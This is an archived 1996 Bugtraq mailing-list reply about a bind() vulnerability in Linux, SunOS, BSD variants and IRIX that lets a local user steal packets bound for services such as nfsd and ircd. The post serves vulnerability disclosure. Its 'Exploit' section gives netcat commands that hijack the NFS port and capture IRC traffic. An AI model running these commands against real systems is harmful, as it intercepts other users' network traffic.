Bugtraq mailing list archives

Re: BoS: bind() Security Problems

From: Bernd.Lehle () RUS Uni-Stuttgart DE (Bernd Lehle)
Date: Wed, 31 Jan 1996 13:18:29 +0100



              System Call: bind()
  Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
                           Probably others.
              Requirement: account on system.
      Security Compromise: Stealing packets from
                           nfsd, yppasswd, ircd, etc.
                  Credits: *Hobbit* <hobbit () avian org>
                           bitblt <bitblt () infosoc com>
                           Aleph One <aleph1 () underground org>
                 Synopsis: bind() does not properly check
                           to make sure there is not a socket
                           already bound to INADDR_ANY on the same
                           port when binding to a specific address.


IRIX 5.3 is vulnerable, too.

Exploit:

[..]

Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...


To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667

--

Bernd Lehle - Stuttgart University Computer Center * A supercomputer <
      Visualization / SFB 382 / Astrophysics       *  is a machine   <
lehle () rus uni-stuttgart de   Tel:+49-711-685-5531  *  that runs an   <
  http://www.tat.physik.uni-tuebingen.de/~lehle    *  endless loop   <
 pgp? -> finger bernd () visbl rus uni-stuttgart de   *  in 2 seconds   <

Current thread:

XFree86 3.1.2 Security Problems David J Meltzer (Jan 28)
- Re: XFree86 3.1.2 Security Problems David Dawes (Jan 28)
- Re: XFree86 3.1.2 Security Problems Anthony C. Zboralski (Jan 29)
- bind() Security Problems Aleph's K-Rad GECOS Field (Jan 30)
  - SGI Security Advisory 19960102-01-P, SGI Security Coordinator (Jan 30)
  - Aiiiieeee!! *Hobbit* (Jan 30)
  - Re: BoS: bind() Security Problems Bernd Lehle (Jan 31)